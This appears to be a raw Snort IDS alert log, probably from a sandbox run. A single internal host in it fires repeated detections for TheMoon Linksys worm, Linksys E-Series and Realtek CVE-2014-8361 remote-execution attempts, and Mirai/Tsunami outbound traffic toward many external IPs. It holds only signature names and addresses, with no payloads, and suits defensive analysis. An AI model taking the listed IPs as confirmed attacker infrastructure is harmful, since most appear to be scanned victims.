    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34018 -> 172.65.247.142:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34018 -> 172.65.247.142:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:34018 -> 172.65.247.142:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59770 -> 172.65.199.248:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59770 -> 172.65.199.248:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:59770 -> 172.65.199.248:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55118 -> 172.65.41.222:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55118 -> 172.65.41.222:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55118 -> 172.65.41.222:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59500 -> 172.247.3.150:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59500 -> 172.247.3.150:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:59500 -> 172.247.3.150:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39910 -> 172.245.25.2:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39910 -> 172.245.25.2:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:39910 -> 172.245.25.2:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33592 -> 88.116.234.70:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37928 -> 88.209.198.204:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36284 -> 88.99.169.45:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49544 -> 88.209.236.131:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39574 -> 112.167.7.171:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54088 -> 112.214.76.152:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44946 -> 112.163.33.145:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 85.208.120.46:8080 -> 192.168.2.23:59390
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.36.145:8080 -> 192.168.2.23:41856
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50108 -> 88.221.186.179:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48634 -> 112.78.47.117:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60054 -> 172.65.137.211:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60054 -> 172.65.137.211:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:60054 -> 172.65.137.211:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42076 -> 88.221.36.131:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41282 -> 95.101.222.173:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55554 -> 95.221.137.251:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.55.65:80 -> 192.168.2.23:51482
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.4.158:80 -> 192.168.2.23:45180
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55902 -> 95.171.45.43:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.94.198:80 -> 192.168.2.23:52016
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.220.80:80 -> 192.168.2.23:53678
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.28.202:80 -> 192.168.2.23:50174
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36916 -> 88.249.249.14:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60072 -> 112.206.20.145:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35618 -> 88.99.16.245:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50020 -> 172.65.219.244:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50020 -> 172.65.219.244:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50020 -> 172.65.219.244:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.232.165:80 -> 192.168.2.23:49112
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.216.59:80 -> 192.168.2.23:55556
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55556 -> 88.221.216.59:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54294 -> 88.153.161.205:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54966 -> 88.193.198.54:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.34.28:80 -> 192.168.2.23:51298
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42232 -> 172.65.130.16:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42232 -> 172.65.130.16:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:42232 -> 172.65.130.16:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40308 -> 172.65.74.80:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40308 -> 172.65.74.80:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:40308 -> 172.65.74.80:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59874 -> 95.110.199.24:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40688 -> 95.217.111.228:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42288 -> 95.100.21.106:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49338 -> 95.57.136.37:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 85.209.136.167:8080 -> 192.168.2.23:50412
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36450 -> 172.65.206.162:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36450 -> 172.65.206.162:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:36450 -> 172.65.206.162:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50266 -> 172.65.232.78:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50266 -> 172.65.232.78:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50266 -> 172.65.232.78:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50994 -> 172.65.102.149:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50994 -> 172.65.102.149:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50994 -> 172.65.102.149:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59318 -> 172.87.239.156:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59318 -> 172.87.239.156:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:59318 -> 172.87.239.156:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41280 -> 156.241.13.56:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34278 -> 95.169.213.171:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33866 -> 88.208.43.5:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56272 -> 95.9.5.210:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59904 -> 95.251.172.52:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38514 -> 95.101.47.91:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46704 -> 95.213.151.210:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48776 -> 95.73.4.31:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39398 -> 95.161.130.41:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:47862 -> 172.65.241.250:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47862 -> 172.65.241.250:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:47862 -> 172.65.241.250:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55064 -> 172.65.144.255:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55064 -> 172.65.144.255:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55064 -> 172.65.144.255:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33114 -> 172.65.113.207:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33114 -> 172.65.113.207:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:33114 -> 172.65.113.207:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43070 -> 172.65.253.13:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43070 -> 172.65.253.13:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:43070 -> 172.65.253.13:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.20.148:8080 -> 192.168.2.23:37430
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56496 -> 184.188.75.207:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56496 -> 184.188.75.207:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:56496 -> 184.188.75.207:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.63.110:8080 -> 192.168.2.23:41754
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.155.119:80 -> 192.168.2.23:51546
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59338 -> 95.147.24.246:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38314 -> 95.248.94.114:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36176 -> 172.65.212.76:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36176 -> 172.65.212.76:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:36176 -> 172.65.212.76:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55510 -> 172.65.197.107:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55510 -> 172.65.197.107:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55510 -> 172.65.197.107:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60928 -> 172.65.142.237:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60928 -> 172.65.142.237:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:60928 -> 172.65.142.237:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42494 -> 88.99.81.60:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39188 -> 88.198.52.78:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54450 -> 88.198.7.190:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35250 -> 95.165.110.168:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.105.44:80 -> 192.168.2.23:56420
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56420 -> 95.101.105.44:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.235.135:80 -> 192.168.2.23:47528
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57978 -> 95.56.42.30:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59842 -> 172.65.195.13:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59842 -> 172.65.195.13:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:59842 -> 172.65.195.13:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:58536 -> 172.65.169.138:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58536 -> 172.65.169.138:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:58536 -> 172.65.169.138:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:58054 -> 172.65.64.158:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58054 -> 172.65.64.158:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:58054 -> 172.65.64.158:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52394 -> 172.65.175.194:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52394 -> 172.65.175.194:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:52394 -> 172.65.175.194:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36414 -> 172.65.70.97:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36414 -> 172.65.70.97:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:36414 -> 172.65.70.97:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51052 -> 88.198.29.115:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37584 -> 88.80.184.63:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35404 -> 172.65.16.229:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35404 -> 172.65.16.229:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:35404 -> 172.65.16.229:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38158 -> 95.215.227.26:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:45636 -> 172.65.140.171:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:45636 -> 172.65.140.171:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:45636 -> 172.65.140.171:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55700 -> 172.65.133.37:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55700 -> 172.65.133.37:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55700 -> 172.65.133.37:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60612 -> 172.65.235.178:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60612 -> 172.65.235.178:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:60612 -> 172.65.235.178:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38834 -> 88.99.0.20:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55288 -> 88.85.93.35:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56500 -> 88.221.222.141:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41214 -> 95.154.57.36:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58666 -> 95.216.115.28:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34590 -> 156.230.24.55:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40168 -> 88.48.73.234:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47236 -> 88.221.12.24:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49350 -> 172.65.13.152:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49350 -> 172.65.13.152:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:49350 -> 172.65.13.152:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44718 -> 88.221.71.17:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45066 -> 88.221.25.104:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58064 -> 88.28.205.20:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33670 -> 95.47.162.199:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.173.204:8080 -> 192.168.2.23:59506
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.100.186:8080 -> 192.168.2.23:47860
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49588 -> 88.217.133.42:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54810 -> 95.140.36.118:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37340 -> 88.42.248.225:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54322 -> 88.218.157.131:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 85.209.139.38:8080 -> 192.168.2.23:42114
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35434 -> 172.65.22.117:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35434 -> 172.65.22.117:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:35434 -> 172.65.22.117:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59542 -> 172.65.179.116:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59542 -> 172.65.179.116:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:59542 -> 172.65.179.116:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42688 -> 172.65.33.172:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42688 -> 172.65.33.172:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:42688 -> 172.65.33.172:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59684 -> 95.172.129.38:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47630 -> 112.216.105.187:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55194 -> 156.241.12.154:52869
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48556 -> 172.65.6.68:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48556 -> 172.65.6.68:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:48556 -> 172.65.6.68:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52722 -> 172.65.111.125:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52722 -> 172.65.111.125:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:52722 -> 172.65.111.125:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46778 -> 172.245.196.198:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46778 -> 172.245.196.198:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:46778 -> 172.245.196.198:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57638 -> 172.255.81.189:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57638 -> 172.255.81.189:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:57638 -> 172.255.81.189:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45310 -> 88.148.101.82:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33528 -> 112.179.205.71:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39638 -> 95.128.134.126:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:32972 -> 88.151.194.9:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46948 -> 88.80.189.217:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56786 -> 88.237.34.118:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56442 -> 172.65.59.72:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56442 -> 172.65.59.72:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:56442 -> 172.65.59.72:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56244 -> 172.65.255.178:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56244 -> 172.65.255.178:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:56244 -> 172.65.255.178:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55426 -> 88.221.6.96:80
